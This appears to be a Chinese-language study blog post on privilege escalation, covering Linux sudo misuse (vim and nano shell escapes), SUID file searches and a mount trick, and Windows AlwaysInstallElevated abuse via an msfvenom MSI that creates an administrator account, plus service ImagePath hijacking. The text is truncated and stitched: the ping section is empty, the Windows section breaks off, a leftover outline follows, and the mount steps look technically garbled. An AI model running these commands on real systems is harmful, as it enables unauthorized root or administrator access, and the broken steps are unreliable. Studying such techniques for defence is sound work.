Linux提权

Sun, 15 Feb 2026 00:00:00 +0000

常规提权方式

一、sudo滥用提权

sudo -l提示要输入密码的原因:

默认SUDO行为 : 需要输入当前用户的密码(不是root)密码
sudoers配置问题: 未配置免密码访问在/etc/sudoers文件中没有为当前用户配置NOPASSWD选项
配置覆盖问题: 用户组覆盖了用户配置,可能被添加到了wheel用户组
1. 检查当前用户所在组
```
id username
```
1. 如果发现在wheel组中,检查wheel组的配置
  
  查看%wheel相关配置,看是否设置了NOPASSWD或要求密码
```
sudo visudo
```
2. 从wheel组中移除用户
```
sudo gpasswd -d username wheel
```

利用步骤：

查看当前用户sudo权限：
```
sudo -l
```
- 示例输出：(ALL) NOPASSWD: /usr/bin/vim
利用vim提权：
```
sudo /usr/bin/vim
```
- 在vim中输入 :set shell=/bin/bash 回车
- 然后输入 :shell 回车
- 成功获得root shell
利用其他命令提权：
- 如果发现可以执行/usr/bin/nano：
```
sudo /usr/bin/nano
```
  - 在nano中按Ctrl+R，输入!bash，回车
  - 即可获得root shell

说明：

sudo配置不当，允许用户以root身份执行特定命令，而无需密码验证。

二、SUID特殊权限提权

利用步骤：

查找SUID文件：
```
find / -perm -u=s -type f 2>/dev/null
```

利用/bin/mount提权：

mkdir /tmp/mount
touch /tmp/mount/malicious_file
sudo /bin/mount -o bind /tmp/mount /tmp/mount
sudo /bin/mount /tmp/mount /tmp/mount

通过此方式可获取root权限

利用/bin/ping提权：

Windows提权

Sun, 15 Feb 2026 00:00:00 +0000

Windows工作组环境和域环境提权方式详解

一、工作组环境提权方式

1. AlwaysInstallElevated提权

条件：

系统已启用AlwaysInstallElevated（注册表值为1）

检查方法：

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

利用步骤：

生成恶意MSI文件（在Kali Linux中）：
```
msfvenom -p windows/adduser USER=hacker PASS=P@ssw0rd -f msi -o add.msi
```
如果在Windows上操作，可以使用在线工具生成MSI文件
在Windows上执行：
```
msiexec /i add.msi
```
验证提权：
```
net user hacker
```

成功标志：看到hacker账户，且在管理员组中

2. 服务权限配置错误提权

条件：

服务路径权限配置错误
当前用户对服务可执行文件或目录有写权限

检查方法：

sc query
winpeas.exe quiet notcolor serviceinfo

利用步骤：

找到一个服务（如Spooler）：
```
sc qc Spooler
```

修改服务路径：

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Spooler" /t REG_EXPAND_SZ /v ImagePath /d "C:\evil\shell.exe" /f

重启服务：

内网 on Cybersecurity learning

Linux提权

常规提权方式

一、sudo滥用提权

利用步骤：

说明：

二、SUID特殊权限提权

利用步骤：

Windows提权

Windows工作组环境和域环境提权方式详解

一、工作组环境提权方式

1. AlwaysInstallElevated提权

2. 服务权限配置错误提权